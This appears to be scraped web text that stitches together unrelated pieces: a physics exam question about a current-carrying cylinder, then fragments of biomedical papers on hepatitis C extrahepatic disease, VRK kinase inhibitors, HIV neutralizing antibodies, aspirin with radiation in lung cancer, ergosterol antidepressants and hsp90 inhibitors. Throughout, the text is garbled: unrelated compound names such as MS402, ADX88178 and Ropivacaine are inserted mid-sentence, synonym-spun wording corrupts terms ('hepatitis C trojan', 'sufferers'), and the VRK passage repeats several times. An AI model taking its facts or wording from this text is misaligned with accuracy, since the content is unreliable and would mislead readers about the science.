(Assume the coil to be short circuited.)
An infinitely long hollow conducting cylinder with radius R carries a uniform current along its surface.
Choose the correct representation of magnetic field (B) as a function of radial distance (r) from the axis of cylinder. | <urn:uuid:f067ee6a-9eaf-4e9e-ba9a-12776ffbc7a4> | CC-MAIN-2023-14 | https://questions.examside.com/past-years/jee/question/pthe-space-inside-a-straight-current-carrying-solenoid-is-jee-main-physics-motion-ojpbdbqjecdfined | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949598.87/warc/CC-MAIN-20230331082653-20230331112653-00605.warc.gz | en | 0.92452 | 222 | 3.5625 | 4 |
The red pulp is infiltrated with small lymphocytes and ill-defined nodules of bigger cells (Figure 10) . adult people . Persistent hepatitis C takes place in 80% MS402 of the cases and will result in cirrhosis and hepatocellular carcinoma . Extrahepatic manifestations (EHMs) of hepatitis C trojan (HCV) an infection were initial reported in the first 1990s and will affect a number of body organ systems with significant morbidity and mortality. 40 to 75% of sufferers with chronic HCV an infection display at least one scientific EHM [4, 5]. HCV an infection is generally seen as a an indolent scientific course that’s influenced by a number of web host, viral, and environmental elements . While HCV might infect various other cells beyond the liver organ, most EHMs are usually secondary towards MS402 the web host immune response towards the viral an infection and not a primary viral cytopathic impact [7, 8]. The organic background of HCV an infection and its own association with EHMs is partially known. Some EHMs, such as for example mixed cryoglobulinemia, have already been connected with hepatitis C both medically and pathologically highly, while various other EHMs may be associated with HCV predicated on higher prevalence, response to antiviral treatment, or anecdotal observation. 2. Systems While direct an infection of extrahepatic tissues cells by HCV continues to be documented, nearly all EHMs are usually supplementary to immune-mediated systems, either autoimmune or lymphoproliferative in nature. HCV an infection leads to upregulation from the humoral disease fighting capability in sufferers with chronic disease, that leads to increases in polyclonal and monoclonal autoantibodies via chronic antigenic stimulation . It’s been postulated that anti-HCV-IgG and HCV lipoprotein complexes may become B-cell superantigens causing the synthesis of non-HCV reactive IgM with rheumatoid factor-like activity . These autoantibodies, subsequently, form immune system complexes, which circulate through the physical body and so are transferred in little to moderate arteries, resulting in supplement activation and extrahepatic damage [7C9]. 3. Mixed Cryoglobulinemia HCV is normally associated with important blended cryoglobulinemia (MC), referred to as type II cryoglobulinemia also. MC may be the many noted extrahepatic manifestation of chronic HCV an infection and is situated in over fifty percent the sufferers [10C13]. Of the 10% are symptomatic [13, 14]. Cryoglobulins are circulating immunoglobulins that precipitate with winter and resolubilize when warmed. In type II Vax2 cryoglobulinemia, the cryoglobulins are comprised of several classes of different immunoglobulins which you are a monoclonal IgM element with rheumatoid factor-like activity . Extension of rheumatoid aspect synthetizing B cells represents the natural hallmark of MC . Many organs like the epidermis, gastrointestinal tract, and kidney may be involved. The traditional triad of symptoms in sufferers with HCV-associated MC is normally palpable purpura, weakness, and arthralgia. 3.1. Palpable Purpura/Leukoclastic Vasculitis Cutaneous vasculitis of HCV-related MC, resulting in palpable purpura, is usually reported in 24C30% of cryoglobulin positive patients [4, 17]. It MS402 is secondary to small and/or medium vessel vasculitis with deposition of immune complexes in the small- and medium-sized dermal vessels . It occurs intermittently, preferentially during the winter months, and is nonpruritic. It characteristically begins with involvement of the lower limbs and techniques cranially toward the stomach, less frequently involving the trunk and upper limbs. The face is usually usually spared. The purpura is usually papular or petechial and persists for 3C10 days with residual brown pigmentation. In addition, Raynaud syndrome and acrocyanosis are MS402 found in 25C34% of patients . Cutaneous biopsy shows a nonspecific mixed inflammatory infiltrate (leukocytoclastic vasculitis) including small vessels (Physique 1). Mononuclear cells may be seen within the walls of the vessels, and, in some cases, endovascular thrombi and fibrinoid necrosis of the arteriolar walls may be seen (Physique 2). Open in a separate window Physique 1 Leukocytoclastic vasculitis: predominantly lymphocytic MS402 mixed inflammatory infiltrate including small vessels in the dermis (hematoxylin-eosin, initial magnification 200). Open in a separate window Physique 2 Leukocytoclastic vasculitis: fibrinoid necrosis of dermal vessels (hematoxylin-eosin, initial magnification.
We thank the staff in the Northeastern Collaborative Gain access to Team beamlines (GU56413 and GU54127), that are funded from the National Institute of General Medical Sciences through the Country wide Institutes of Health (P41 GM103403). both VRKs had been identified from the framework?activity relationship combined with crystallographic evaluation of key substances. We anticipate our leads to serve as a starting place for the look of stronger and specific inhibitors against each one of the two VRKs. C em F /em em c /em ) contoured at 1.0. Needlessly to say, 5 and 18 had been within the ATP-binding sites of VRK2 and VRK1, respectively (Shape ?Shape33A,B). The binding pose for 18 showed the 2-amino moiety pointed toward the relative back again of VRK2 ATP-binding site. The 2-amino group as well as the pyridine N atom of 18 founded one hydrogen relationship each towards the carbonyl and amide sets of VRK2 hinge residues Glu122 and Leu124, respectively. In VRK1-KD crystals, the ligand could possibly be seen in three from the four proteins substances in the asymmetric device and, remarkably, was within two different poses. The to begin these was equal to the one noticed for 18 certain to VRK2-KD. In the next binding setting, the 2-amino band of 5 directed toward the solvent and, using the pyridine nitrogen atom collectively, facilitated HBs with primary string atoms from VRK1-KD hinge residue Phe134. The cocrystal constructions helped us to rationalize the relevance from the difluorophenol moiety for binding. Of substance binding cause Irrespective, this group facilitated a HB network with polar part stores from structurally conserved residues inside the kinase website of VRK1 (Lys71 and Glu83) and VRK2 (Lys61 and Glu73). The difluorophenol group participating in these contacts displayed unique dihedral angles to the 2-amino core depending on its attachment position: 45 in R1 and 9 in R2. In VRK1, these different orientations of the difluorophenol group were accommodated by a related movement of the side chain from residue Met131, which occupies the gatekeeper position in this protein. Consequently, the difluorophenol group fitted tightly between the C-helix and the gatekeeper residue in both poses. These observations might clarify why we could not find substituents that improved binding on the difluorophenol group. The VRK2-KD cocrystal structure also revealed the 18 sulfonamide group pointed away from the protein ATP-binding site and was mostly solvent-exposed. A similar observation was made for the difluorophenol group in 5 that did not interact with VRK1-KD C-helix (Supplementary Number S5DCF). Our DSF results also indicated that placement of polar organizations in the meta-position resulted in slight raises of em T /em m, especially for VRK2-KD (10 vs 11, for example). At this position, polar organizations from your ligand might be able to participate polar organizations from VRK2-KD P-loop. Regardless of the ligand binding present, the P-loop of VRK1 was found to be folded over 5. This conformation was likely stabilized by hydrophobic relationships observed between P-loop residue Phe48 and 5s three-ring system. By contrast, VRK2 P-loop did not fold over 18. In our VRK2 cocrystal, the P-loop was found rotated toward the protein C-helix by 6 ? (Supplementary Number S5C). Consequently, comparative aromatic residues within the P-loop of VRK1 (Phe48) and VRK2 (Phe40) occupied different positions in each of the proteins ATP-binding site. The two binding modes observed for 5 in VRK1 suggested the 2-amino moiety experienced no binding preference for either of the hinge carbonyl organizations it can interact with (Figure ?Number33A,B). This led us to hypothesize that these two relationships were either equally effective or equally poor in the binding process. To address these hypotheses, we synthesized the following analogues: (i) 23, with two amino organizations that could interact with both hinge carbonyl organizations simultaneously; (ii) 24, having a 2-amino and a space-filling 6-methyl group; (iii) 25, with the 2-amino group eliminated; and (iv) 26, with the.All authors have given approval to the final version of the manuscript. Notes This work was supported from the Brazilian agencies FAPESP (Funda??o de Amparo Pesquisa do Estado de S?o Paulo) (2013/50724-5 and 2014/5087-0), Embrapii (Empresa Brasileira de Pesquisa e Inova??o Industrial), and CNPq (Conselho Nacional de Desenvolvimento Cientfico e Tecnolgico) (465651/2014-3 and 400906/2014-7). binding mode and substituent preferences between the two VRKs were identified from the structure?activity relationship combined with the crystallographic analysis of key compounds. We expect our results to serve as a starting point for the design of more specific and potent inhibitors against each of the two VRKs. C em F /em em c /em ) contoured at 1.0. As expected, 5 and 18 were found in the ATP-binding sites of VRK1 and VRK2, respectively (Number ?Number33A,B). The binding present for 18 showed the 2-amino moiety pointed toward the back of VRK2 ATP-binding site. The 2-amino group and the pyridine N atom of 18 founded one hydrogen relationship each to the carbonyl and amide groups of VRK2 ADX88178 hinge residues Glu122 and Leu124, respectively. In VRK1-KD crystals, the ligand could be observed in three out of the four protein molecules in the asymmetric unit and, remarkably, was found in two different poses. The first of these was equivalent to the one observed for 18 certain to VRK2-KD. In the second binding mode, the 2-amino group of 5 pointed toward the solvent and, together with the pyridine nitrogen atom, facilitated HBs with main chain atoms from VRK1-KD hinge residue Phe134. The cocrystal constructions helped us to rationalize the relevance of the difluorophenol moiety for binding. No matter compound binding present, this group facilitated a HB network with polar part chains from structurally conserved residues within the kinase website of VRK1 (Lys71 and Glu83) and VRK2 (Lys61 and Glu73). The difluorophenol group participating in these contacts displayed unique dihedral angles to the 2-amino core depending on its attachment position: 45 in R1 and 9 in R2. In VRK1, these different orientations of the difluorophenol group were accommodated by a related movement of the side chain from residue Met131, which occupies the gatekeeper position in this protein. As a result, the difluorophenol group fitted tightly between the C-helix and the gatekeeper residue in both poses. These observations might clarify why we could not find substituents that improved binding on the difluorophenol group. The VRK2-KD cocrystal structure also revealed the 18 sulfonamide group pointed away from the protein ATP-binding site and was mostly solvent-exposed. A similar observation was made for the difluorophenol group in 5 that did not interact with VRK1-KD C-helix (Supplementary Number S5DCF). Our DSF results also indicated that placement of polar organizations in the meta-position resulted in slight raises of em T /em m, especially for VRK2-KD (10 vs 11, for example). At this position, polar organizations from your ligand might be able to engage polar organizations from VRK2-KD P-loop. Regardless of the ligand binding present, the P-loop of VRK1 was found to be folded over 5. This conformation was likely stabilized by hydrophobic relationships observed between P-loop residue Phe48 and 5s three-ring system. By contrast, VRK2 P-loop did not fold over 18. In our VRK2 cocrystal, the P-loop was found rotated toward the protein C-helix by 6 ? (Supplementary Number S5C). Consequently, comparative aromatic residues within the P-loop of VRK1 (Phe48) and VRK2 (Phe40) occupied different positions in each of the proteins ATP-binding site. The two binding modes observed for 5 in VRK1 suggested the 2-amino moiety experienced no binding preference for either of the hinge carbonyl organizations it can interact with (Figure ?Number33A,B). This led us to hypothesize that these two relationships were either equally effective or equally weakened in the binding procedure. To handle these hypotheses, we synthesized the next analogues: (i) 23, with two amino groupings that could connect to both hinge carbonyl groupings concurrently; (ii) 24, using a 2-amino and a space-filling 6-methyl group; (iii) 25, using the 2-amino group taken out; and (iv) 26, using the 2-amino group substituted with a 2-methyl group (Desk 1, Supplementary Desk S1). DSF assays uncovered that none of the new analogs got improved em T /em m beliefs for VRK2-KD (Desk 1, Supplementary Desk S1). These outcomes suggested the fact that HB between your hinge carbonyl group as well as the 2-aminopyridine primary is a successful relationship for VRK2. Also, for VRK1-FL, substances 23, 24, and 25 didn’t improve em T /em m beliefs over those noticed for 5. Poor outcomes noticed for 23 and 24 may be described by clashes between among the two substituents in these substances (on the 2- or 6-placement in the pyridine primary) and primary string atoms from residues inside the kinase hinge area. In comparison, 26 and 5 had been equipotent in the DSF assay, helping the hypothesis the fact that 2-amino moiety added little towards the binding of 5.designed, performed, and examined enzymatic assays. of even more particular and potent inhibitors against each one of the two VRKs. C em F /em em c /em ) contoured at 1.0. Needlessly to say, 5 and 18 had been within the ATP-binding sites of VRK1 and VRK2, respectively (Body ?Body33A,B). The binding cause for 18 demonstrated the 2-amino moiety directed toward the trunk of VRK2 ATP-binding site. The 2-amino group as well as the pyridine N atom of 18 set up one hydrogen connection each towards the carbonyl and amide sets of VRK2 hinge residues Glu122 and Leu124, respectively. In VRK1-KD crystals, the ligand could possibly be seen in three from the four proteins substances in the asymmetric device DNM1 and, amazingly, was within two different poses. The to begin these was equal to the one noticed for 18 sure to VRK2-KD. In the next binding setting, the 2-amino band of 5 directed toward the solvent and, alongside the pyridine nitrogen atom, facilitated HBs with primary string atoms from VRK1-KD hinge residue Phe134. The cocrystal buildings helped us to rationalize the relevance from the difluorophenol moiety for binding. Irrespective of compound binding cause, this group facilitated a HB network with polar aspect stores from structurally conserved residues inside the kinase area of VRK1 (Lys71 and Glu83) and ADX88178 VRK2 (Lys61 and Glu73). The difluorophenol group taking part in these connections displayed specific dihedral angles towards the 2-amino primary based on its connection placement: 45 in R1 and 9 in R2. In VRK1, these different orientations from the difluorophenol group had been accommodated with a matching movement of the medial side string from residue Met131, which occupies the gatekeeper placement in this proteins. Therefore, the ADX88178 difluorophenol group installed tightly between your C-helix as well as the gatekeeper residue in both poses. These observations might describe why we’re able to not discover substituents that improved binding within the difluorophenol group. The VRK2-KD cocrystal framework also revealed the fact that 18 sulfonamide group directed from the proteins ATP-binding site and was mainly solvent-exposed. An identical observation was designed for the difluorophenol group in 5 that didn’t connect to VRK1-KD C-helix (Supplementary Body S5DCF). Our DSF outcomes also indicated that keeping polar groupings in the meta-position led to slight boosts of em T /em m, specifically for VRK2-KD (10 vs 11, for instance). As of this placement, polar groupings through the ligand could probably engage polar groupings from VRK2-KD P-loop. Whatever the ligand binding cause, the P-loop of VRK1 was discovered to become folded over 5. This conformation was most likely stabilized by hydrophobic connections noticed between P-loop residue Phe48 and 5s three-ring program. In comparison, VRK2 P-loop didn’t fold over 18. Inside our VRK2 cocrystal, the P-loop was discovered rotated toward the proteins C-helix by 6 ? (Supplementary Body S5C). Consequently, comparable aromatic residues inside the P-loop of VRK1 (Phe48) and VRK2 (Phe40) occupied different positions in each one of the protein ATP-binding site. Both binding modes noticed for 5 in VRK1 recommended the fact that 2-amino moiety got no binding choice for either from the hinge carbonyl groupings it can connect ADX88178 to (Figure ?Body33A,B). This led us to hypothesize these two connections had been either equally successful or equally weakened in the binding procedure. To handle these hypotheses, we synthesized the next analogues: (i) 23, with two amino groupings that could connect to both hinge carbonyl groupings concurrently; (ii) 24, using a 2-amino and a space-filling 6-methyl group; (iii) 25, using the 2-amino group taken out; and (iv) 26, using the 2-amino group substituted with a 2-methyl group (Desk 1, Supplementary Desk S1). DSF assays uncovered that none of the new analogs got improved em T /em m beliefs for VRK2-KD (Desk 1, Supplementary Desk S1). These outcomes suggested the fact that HB between your hinge carbonyl group as well as the 2-aminopyridine primary is a successful relationship for VRK2. Also, for VRK1-FL, substances 23, 24, and 25 didn’t improve em T /em m beliefs over those noticed for 5. Poor outcomes noticed for 23 and 24 may be described by clashes between among the two substituents in these substances (on the 2- or 6-placement in the pyridine primary) and primary string atoms from residues inside the kinase hinge area. In comparison, 26 and 5 had been equipotent in the.
The unusual demands on germline reactivity and antibody evolution would counteract – but apparently not preclude – the elicitation of potent bNAbs. the structure of a near-native soluble HIV-1 envelope glycoprotein (Env) trimer in complex with different bNAbs was determined to almost atomic-scale resolution by cryo-electron microscopy and crystallography (1, 2). Native, functional Env trimers on the surface of virions are the only relevant targets for NAbs. And all antibodies that reach a certain occupancy on functional trimers will neutralize viral infectivity. But the virus has evolved a number of defenses against the induction and binding of NAbs, particularly those directed to the less variable areas: considerable N-linked glycosylation, variable loops (V1-V5), quaternary relationships, and conformational flexibility shield conserved epitopes. However, the epitopes of many broadly neutralizing (bNAbs) involve residues in variable areas (V1-5) as well as glycans (3C6). Four clusters of bNAb epitopes have emerged so far: the CD4-binding site, the V2 loop with its glycans, the V3 and V4 bases with connected glycans, and the membrane-proximal external region (MPER) in gp41 (3C5). Why dont antibody reactions to recombinant Env hone in on these epitopes? A problem with such Env immunogens is definitely that they differ from practical Env; and many non-neutralization epitopes are revealed only on nonfunctional forms of Env, such as precursors, which are uncleaved between gp120 and gp41, disassembled oligomers, and FGF-18 denatured or degraded Env (5, 7). The non-neutralization epitopes are often strongly immunogenic both in vaccination and illness and may therefore act as decoys, diverting from neutralizing reactions (3, 4). Germline reactivity of Env? You will find further hurdles to bNAb elicitation. Poor reactivity of Env with the germline ancestors of bNAbs may be one. Antibody specificity arises from the blending of germline diversity in immunoglobulin genes with somatic recombination and mutations in variable areas (3, 4). But germline antibodies differ in their propensity to develop into HIV-1 bNabs: e.g., the most potent CD4bs-directed bNAbs (such as NIH45-46 and 3BNC117) have the gene section of the germline variable heavy chain VH1-2 or VH1-46 in common. The structural features of these VH variants favor mimicry of CD4 (4, 8). Recombinant Env proteins often do not bind germline versions of known bNAbs (3, 4, 9C15). Several potential explanations may account for such a deficit in reactivity. The forms of Env used as probes may be structurally deficient: whether cleaved stabilized trimers that Ropivacaine better mimic native Env spikes also fail to bind to unmutated ancestors of bNAbs deserves to be systematically investigated. Furthermore, the genetic make-up of the Env tested may not sufficiently match that of the original Env stimulus. Or, on the other hand, something other than Env started the selection process, and along the way Env reactivity arose. In this regard, it is notable that bNAbs are more often poly-reactive than are normal antibodies (3, 4, 16), although many bNAbs are not (6); and polyreactivity is definitely probably augmented during HIV-1 illness. Determinants of germline-reverted antibody binding to Env are actively dissected with the aid of computational methods for inferring unmutated common ancestors (3, 13). Indeed, some Env constructs, such as the outer website of gp120, glycosylation mutants, V1V2 glycopeptides, multimerized forms, and founder-virus variants, do react with germline antibodies (3, 10C12, 14, 17, 18). Unusual affinity maturation After specific uptake of antigen and encounters with cognate T-helper cells, na?ve B-cells enter germinal centers of secondary lymphoid organs where they proliferate, diversify, and express antigen-binding B-cell receptors. The better the B-cell receptors bind, the more antigen the B cells internalize and present, thereby getting reinforcing stimuli from follicular T-helper cells (19). But Ropivacaine the affinity boost has a ceiling arranged by diffusion and endocytosis rates, and therefore B-cells usually exit the germinal center after ~10 mutations in the VH. Human IgG has on average only 10C20 such mutations, but strain-specific HIV-1 NAbs have twice as many, and bNAbs ~80. This degree of somatic hyper-mutation (SHM) would Ropivacaine arise from iterated germinal-center cycles, in which viral escape mutants with reduced affinity continually result in affinity repair: SHM, potency, and breadth are all correlated (17). Apart from deletions and insertions in the complementarity-determining areas (CDRs), which are rare in regular antibodies (3, 4), bnAbs display mutations even.
As shown in Body?2B and Body?S8, cox2 knockdown sensitized A549 cells at 24 and 48?hr post-irradiation, as cell viability reduced in comparison to untreated cells significantly. of chromatin looping was mediated with the inhibition of nuclear translocation of p65 and reduced enrichment of p65 at brought about A549 cells delicate to -rays with the induction of apoptosis. To conclude, we present proof an effective healing treatment concentrating on the epigenetic legislation of lung tumor and a potential technique to get over rays resistance in tumor cells. was discovered in colorectal,13 prostate,14 lung,15 breasts,16 and various other cancers. Additional research showed that raised appearance in tumors was connected with elevated angiogenesis, tumor invasion, and level of resistance to radiation-induced apoptosis.17 However, the systems where exerts cytoprotection aren’t understood completely. 18 Gene expression is regulated with the mixed action of multiple enhancer and promoter locations.25 Therefore, the regulation from the chromosomal conformation of locus may be targeted for cancer treatment. Studies show that some chemotherapeutic agencies induce appearance of apoptosis-related genes by regulating chromosomal conformation. For instance, camptothecin was proven to diminish chromatin looping and induce apoptosis directly.26 Due to its anti-tumor results, aspirin provides drawn interest being a book chemotherapeutic medication recently. 27 The molecular system of aspirin was proven to inhibit cox2 activity previously, preventing the production of prostaglandins thereby.28 In today’s research, we used normal and lung cancer cells to FGFR4-IN-1 review the combinatorial therapeutic ramifications of rays and aspirin as well as the underlying system. We confirmed that pre-treatment with aspirin at sublethal dosages considerably sensitized NSCLC cells to rays but demonstrated lower sensitization results on normal individual lung fibroblasts (NHLFs) and individual cancer of the colon cells (HCT116). Using 3C evaluation, we demonstrated that aspirin disrupted the chromosomal structures from the locus by inhibiting p65 nuclear translocation, which improved the efficiency of rays treatment and induced cell apoptosis. This research proposed a book healing approach of merging aspirin with rays to take care of lung tumor and deciphered the system of cox2 suppression by aspirin. Outcomes Rabbit polyclonal to IFIT5 The Function of cox2 Appearance in Radiosensitivity of Lung Tumor?Cells To overcome rays resistance in tumor cells, mixture therapy with chemotherapeutic agencies continues to be proven effective in lots of different human malignancies.29 Aspirin, an anti-inflammatory drug, improved cell death in individual prostate and cancer of the colon.30, 31 Before we completed the combination research, aspirin (0,?0.5, 1, 2, and 5?mM) and rays (0, 1, 2, 5, and 8 Gy) were tested, respectively, because of their toxicity (Statistics S1 and S2), and 1?mM aspirin with small toxicity and 5?Gy -rays, which normally can be used to take care FGFR4-IN-1 of lung tumor cells in the clinical test,32 were selected for even more research finally. To examine whether aspirin improved the radiosensitivity of lung tumor cells, cell success was dependant on colony development assay for A549 cells. As proven in Body?1A, cells treated with a combined mix of aspirin and rays exhibited reduced survival subsequent treatment significantly, in comparison to cells treated with rays alone. Likewise, pre-treatment with aspirin in various other NSCLC cells (H1299 cells) also led to significant radiosensitivity (Body?S3). Furthermore, because of the problems of colony development for NHLF cells, we likened the difference of radiosensitivity between tumor lung cells (A549) and NHLF cells, using the endpoints of cell and apoptosis?viability, by fluorescence-activated cell sorting (FACS) and 3-(4,5-dimethyl-2-thiazolyl)-2, 5-diphenyl-2-H-tetrazolium bromide (MTT) assay. Our outcomes showed FGFR4-IN-1 that, weighed against NHLF cells, A549 cells pre-treated with aspirin had been more delicate to rays, exhibiting higher degrees of apoptosis (Statistics 1B and 1C) and a substantial reduced amount of cell viability at 24 and 48?hr post-irradiation (Body?1D; Body?S4). To help expand determine whether there is the radiosensitivity of aspirin for various other cancers cells, HCT116 individual cancer of the colon cells were chosen and treated using a mixture therapy of aspirin and rays to validate its efficiency in other malignancies, but a lesser sensitization impact was discovered (Body?S5). Jointly, our data confirmed that mixture treatment of aspirin and rays was far better in concentrating on lung tumor cells than either one treatment. Moreover, the mixture treatment had not been very much poisonous for regular lung digestive tract and cells tumor cells, recommending the fact that combination therapy may be specific to lung tumor. Open in another window Body?1 Cytotoxicity of Mixture Treatment of.
Particularly, a possible role of mitochondrial function, including biosynthesis, bioenergetics, and signaling, should be considered in mediating the sex differences in psychiatric disorders . antidepressant effects. Moreover, one derivative of Er, ergosteryl 2-naphthoate (ErN), exhibited stronger antidepressant AAI101 activity in vivo compared to Er. Acute administration of ErN (5 mg/kg, i.p.) and a combination of ErN (0.5 mg/kg, i.p.), reboxetine (2.5 mg/kg, i.p.), and tianeptine (15 mg/kg, i.p.) reduced the immobility time in the FST. Pretreatment with bicuculline (a competitive -aminobutyric acid (GABA) antagonist, 4 mg/kg, i.p.) and during the experimental period. After one week of acclimatization, all mice were randomly divided into different groups (= 10). 2.2. Synthesis of Compounds To a solution of 2-naphthoic acid (0.3 mmol) and EDCI (0.4 mmol) in 5 mL dichloromethane stired for 10 minutes, we added a solution of 0.2 mmol of ER and DMAP (0.2 mmol) in 5 mL dichloromethane. After the answer was heated to reflux for 8 h, the precipitate was removed by filtration, and the solvent was removed under reduced pressure. The residue was purified by silica gel chromatography and eluted with petroleum ether/ethyl acetate (5:1, for 5 min at 4 C. The supernatants were collected for the detection of GABA and Glu by RP-HPLC method . The samples were Rabbit Polyclonal to ARG1 pre-column derivatization with 2,4-dinitrofluorobenzene (DNFB). The content was calculated by external standard method. HPLC analysis was carried out on a Shimadzu LC2010A series HPLC system (Shimadzu, Kyoto, Japan). An Agilent C18 column (200 mm 4.6 mm, i.d., 5 m) was used for all separations at a column heat of 35 C. The binary gradient elution system consisted of 0.05 mol/L sodium acetate buffer (pH 6.0, A) and Acetonitrile/water (1:1, multiple comparison test. A value of 0.05 was considered statistically significant. 3. Results 3.1. Synthesis and Structural Identification The Er esterification derivatives (shown in Physique 1) were obtained via the reaction of Er with organic acids in dichloromethane at a heat of 70 C by the way of reflux. Because water produced during the reaction slows down or even stops the reaction, we carried out the reversible process with two molar ratios of EDCI to avoid side-effects. DMAP was used as a catalyst. The products were isolated using a silica gel column. Two methods (FTIR and NMR) were used to identify the molecular structures of the synthesized Er esters. The IR absorption spectrum of Er shows an absorption at 1710.7 cm?1, which is from C=O stretch, and the absorption bands at 3342.0C3401.7 cm?1 indicate the existence of -O-H (-O-H stretch). For all those Er esters, absorption was observed at 1674C1730 cm?1 (C=O stretch in moiety of acyl group), indicating the introduction of an acyl group. The molecular structures of synthesized products were identified by individual NMR analysis, and the characteristic chemical shifts were detailed as follows. In 1H-NMR spectrum of all Er esters, the signal at 3.0C6.0 (= 1.5, 8.7 Hz, 8-H), 7.973 (= 1.2, 8.7 Hz, 5-H), 7.890 (= 8.7 Hz, 3,4-H), 7.611 (= 1.2, 8.7, 14.4 Hz, 6-H), 7.588 (= 1.5, 8.7, 14.4 Hz, 7-H), 5.649 (= 4.2, 7.2 Hz, 22-H), 5.221 (= 4.2, AAI101 7.2 Hz, 23-H), 5.043 (= 6.6 Hz, 21-H), 1.031 (s, 3H, 18-H), 0.956 (= 6.6 Hz, 28-H), 0.877 (= 6.9 Hz, 26-H), 0.862 (= 6.6 Hz, 27-H), 0.657 (= 0.9, 1.8 Hz, 5-H), 7.111 (= 0.9, 3.6 Hz, 3-H), 6.441 (= 1.8, 3.6 Hz, 4-H), 5.542 (= 4.2, 7.2 Hz, 22-H), 5.137 (= 4.2, 7.2 Hz, 23-H), 4.883 (= 6.6 Hz, 21-CH3), 0.916 (= 6.9 Hz, 28-H), 0.781 (= 6.9 Hz, 26-H), 0.766 (= 6.9 Hz, 27-H), 0.565 (= 1.5, 7.8 Hz, 6-H), 7.477 (= 1.8, 7.8 Hz, 4-H), 6.990 (= 7.8 Hz, 3-H), 6.904 (= 0.9, 7.8 Hz, 5-H), 5.637 (= 4.2, 7.2 Hz, 22-H), 5.140 (= 4.2, 7.2 Hz, 23-H), 5.029 (= 6.6 Hz, 21-CH3), 1.009 (= 6.9Hz, 28-H), 0.860 (= 6.6 Hz, 26-H), 0.845 (= 6.6 Hz, 27-H), 0.649 (= 10 in each group), compared with the control group, * 0.05, ** 0.01. One way ANOVA, Tukey test. 3.3. The Effective and Sub-Effective Doses of ErN in the FST Physique 2B shows that ErN (5 mg/kg, i.p.) (F(1,18) = 22.57, 0.01) significantly reduced the immobility time in the FST compared with other dose groups, and the dosage of 0.5 mg/kg could AAI101 not reduce the immobility time compared with that of the control group. Therefore, 5 mg/kg AAI101 and 0.5 mg/kg were chosen as the effective dose and sub-effective dose, respectively. 3.4. The Antidepressant Effect of Co-Administration of the Sub-Effective Doses of ErN (0.5.
Unlike in Grp94, however, usage of Site 2 in Hsp90 is obstructed with the comparative side string of Phe138, the same as Grp94 Phe199. The origins from the golf swing motion of Phe199 in Grp94 that exposes Site 2 for 8-aryl group occupancy aren’t yet fully understood. and so are competitive inhibitors of ATP binding . Therefore, they stop chaperone actions by avoiding the conformational rearrangements that result in chaperone activity. Even though the ATP hydrolysis routine of hsp90s needs efforts from all three hsp90 domains, the structural basis for inhibitor affinity could be grasped from learning the N-terminal area in isolation [25, 40, 41]. In huge part that is because of the fact that all from the conformational rearrangements that result in the active condition from the chaperone, including cover closure and N-terminal site dimerization, occur after ATP binding. Inhibitor binding therefore decreases to a nagging issue of contending with ATP for the binding pocket, which is situated inside the N-terminal domain entirely. This circumstance offers shown to be experimentally fortuitous as the N-terminal domains of hsp90s have already been generally amenable to crystallization. Therefore, while the framework of the 3-Hydroxydodecanoic acid inhibited complicated of any intact hsp90 chaperone offers yet to become reported, over 300 crystal constructions of N-terminal site:ligand complexes have already been determined. Oddly enough, while framework determinations of hsp90:ligand complexes possess used the N-terminal site, the main biochemical assay for calculating inhibitor binding can be a fluorescence polarization displacement assay that utilizes the Rabbit Polyclonal to CEBPD/E intact hsp90 chaperone for maximal sign to sound . The known truth how the framework dedication and assay methods, which were optimized using different chaperone constructs, are non-etheless experimentally congruent makes 3-Hydroxydodecanoic acid up about a lot of the carrying on progress from the hsp90 inhibitor advancement field. The achievement of Geldanamycin in determining your client pool of Hsp90, and the next realization that inhibition of Hsp90 got the potential to become therapeutically useful, offers resulted in an explosion of attempts to build up high affinity inhibitor substances that bind towards the N-terminal site. Compounds predicated on no less than 19 different scaffolds that focus on the ATP binding pocket are undergoing clinical tests . Regardless of the achievement in identifying book scaffolds for Hsp90 inhibition, two significant problems remain. First, the existing generation of inhibitors in clinical trials target all paralogs now. These pan-hsp90 inhibitors are of limited make use of, nevertheless, in deconvoluting the natural part of anybody paralog. If inhibitors that targeted an individual paralog could possibly be developed, it really is very clear from the knowledge of Geldanamycin our knowledge of the part of every chaperone in the cell will be considerably advanced. Second, as may be anticipated from inhibitory strategies that focus on a broad selection of customer proteins indiscriminately, excitement for the medical utility of the existing group of hsp90 inhibitors continues to be tempered from the observation of adverse unwanted effects connected with treatment [39, 43]. Included in these are hepatotoxicity, hypoatremia, hypoglycemia, exhaustion, diarrhea, general toxicities connected with DMSO formulations, as well as the upregulation of compensatory chaperone pathways such as for example Hsp70. Since it can be axiomatic how the first path to minimizing unwanted effects can be by improved selectivity in focusing on, a substantial challenge is to build up compounds that target an individual hsp90 paralog just. As the fundamental notion of focusing on specific hsp90 paralogs using selective inhibitors is of interest in rule, used the high series and structural homology of the average person members from the hsp90 family members would appear to create them poor applicants for this strategy. Of their N-terminal domains, the four mobile paralogs exhibit series identities of 50% or even more (Shape 4). Worse Even, 3-Hydroxydodecanoic acid the proteins that range the ATP/ligand binding pocket are over 70% similar, with 21 out of 29 residues conserved totally, and the rest of the 8 are conserved highly. Despite these challenging prospects, nevertheless, paralog selective inhibitors have already been developed. The main element to these advancements, as will become discussed in the next sections, continues to be the recognition and exploitation of three wallets, termed Site 1, Site 2, and Site 3, that type a halo of potential selectivity instantly next to the ATP binding cavity (Shape 6D). These wallets form pairwise substance binding sites using the central ATP binding cavity offering as the normal partner. The power of the ligand to effectively gain access to and stably bind these substance sites in huge part makes up about selective paralog binding. Open up in another window Shape 4 Positioning of human being Hsp90, Hsp90, Grp94, and Capture-1 N-terminal domains. Identical residues are shaded dark, homologies are shaded gray. Residues composed of Sites 1, 2, and 3 are indicated by numbered squares above the residues. The primary ATP binding pocket can be indicated by squares tagged with the notice C. Open up in another window Shape 6 N-terminal site structures 3-Hydroxydodecanoic acid displaying ligand binding sites and overlay of binding site residues from specific paralogs. A) Grp94 in.
